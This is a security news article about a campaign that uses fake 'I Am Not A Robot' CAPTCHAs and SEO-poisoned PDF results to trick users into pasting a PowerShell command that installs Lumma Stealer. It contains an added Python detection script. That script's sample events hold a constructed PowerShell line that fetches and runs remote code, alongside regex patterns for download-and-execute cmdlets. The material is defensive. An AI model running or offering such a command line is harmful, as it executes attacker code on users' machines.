5,000 CAPTCHA Tests Used As Infostealer Gateways—Do Not Complete Them
Security researchers have uncovered a sinister threat campaign that has deployed as many as 5,000 fake CAPTCHA "I Am Not A Robot" tests to install the notorious Lumma Stealer malware. This malicious software is designed to steal sensitive information such as passwords, credit card details, and personal data from unsuspecting victims.
Netskope Threat Labs researchers have been tracking this widespread phishing campaign, which uses fake CAPTCHA images to trick users into completing the "I Am Not A Robot" test. The ultimate goal of these malicious tests is to install the Lumma infostealer malware, which can compromise a victim's security in a matter of seconds.
According to Jan Michael Alcantara, a threat research engineer at Netskope Threat Labs, the attackers employ SEO tactics to trick victims into visiting pages by clicking on malicious search engine results. Some of these fake CAPTCHAs contain embedded links that direct users to malicious websites, where they are prompted to paste clipboard content into the Windows Run dialog.
"This is a red flag in itself," warned Alcantara. "If the victim follows the instructions, a PowerShell command is executed that downloads and executes the Lumma Stealer malware." The report also revealed that at least 7,000 users have been affected so far, with most located in North America, Asia, and Southern Europe across various sectors such as technology, financial services, and manufacturing.
The Anatomy of the Attack
The PDF files used to deliver the Lumma Stealer malware contain images that direct victims to download the document. Once downloaded, the report explained, the victim is redirected to a malicious website with a fake CAPTCHA test. If completed, this test leads to the execution of a PowerShell command that downloads and executes the malware.
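For defenders, the final step described above (a command pasted into the Run dialog that makes PowerShell download and execute a payload) leaves a recognizable process-creation record. The following is an added detection example, not code from Netskope or from the original article; the event field names follow Sysmon process-creation records, and the sample events, paths, and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# Traits of a download-and-execute PowerShell command line.
CHECKS = {
    "download": re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                           r"downloadstring|downloadfile|start-bitstransfer)\b"),
    "execute": re.compile(r"(?i)\b(iex|invoke-expression|start-process)\b"),
    "hidden": re.compile(r"(?i)(?<!\S)-w(?:in[a-z]*)?\s+hidden\b"),
    # -EncodedCommand and its short forms, followed by a base64 argument
    "encoded": re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})"),
}

def expand(cmdline):
    """Append the decoded text of any -EncodedCommand argument (base64 of UTF-16LE)."""
    text = cmdline
    for blob in CHECKS["encoded"].findall(cmdline):
        try:
            text += " " + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # not base64 or not UTF-16LE: keep the raw text only
            pass
    return text

def findings(event):
    """Traits found in one process-creation event; empty unless Run-dialog PowerShell."""
    # The Run dialog starts programs as direct children of explorer.exe.
    if not event["ParentImage"].lower().endswith("\\explorer.exe"):
        return set()
    if not re.search(r"(?i)\\(powershell|pwsh)\.exe$", event["Image"]):
        return set()
    text = expand(event["CommandLine"])
    return {name for name, rx in CHECKS.items() if rx.search(text)}

def alerts(events):
    """Indexes of events whose command line both downloads and executes."""
    return [i for i, e in enumerate(events) if {"download", "execute"} <= findings(e)]

# Constructed sample events; field names follow Sysmon process-creation records.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = "iex (irm https://cdn.example.invalid/verify.txt)"
BLOB = base64.b64encode(CMD.encode("utf-16-le")).decode()
def ev(parent, cmdline):
    return {"ParentImage": parent, "Image": PS, "CommandLine": cmdline}
EVENTS = [
    ev(r"C:\Windows\explorer.exe", f'powershell -w hidden -c "{CMD}"'),
    ev(r"C:\Windows\explorer.exe", f"powershell -NoP -enc {BLOB}"),
    ev(r"C:\Windows\explorer.exe", r"powershell -File C:\Scripts\backup.ps1"),
    ev(r"C:\Program Files\Agent\agent.exe", f'powershell -c "{CMD}"'),  # not from Run
]

if __name__ == "__main__":
    print(alerts(EVENTS))
```

Because explorer.exe is also the parent of programs started from the Start menu and shortcuts, treat a match as a lead to triage rather than proof that the Run dialog was used.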
The Language of the Attack
Researchers have observed that nearly half of the 4,000 targeted keywords are related to user guides or manuals, while over a third are for templates and forms. The most frequently repeated keywords used to distribute the malicious documents include "pdf," "free," "download," and "printable."
Avoiding the Danger
Experts stress that knowing which PDF files are involved in these attacks is crucial to avoiding them. Thankfully, Netskope Threat Labs has made the indicators of compromise related to this latest infostealer campaign available in its GitHub repository.
"By being aware of these fake CAPTCHA tests and taking steps to avoid them, users can protect themselves against this malicious threat," warned Alcantara. "Be cautious when searching for PDF documents online, as attackers are using SEO tactics to trick victims into completing the 'I Am Not A Robot' test."
The Importance of Caution
"This is a wake-up call for all users to be vigilant when searching for PDF documents online," said Alcantara. "The threat landscape is constantly evolving, and attackers are becoming increasingly sophisticated in their tactics." By staying informed and taking proactive measures to protect themselves, individuals can avoid falling victim to this malicious campaign.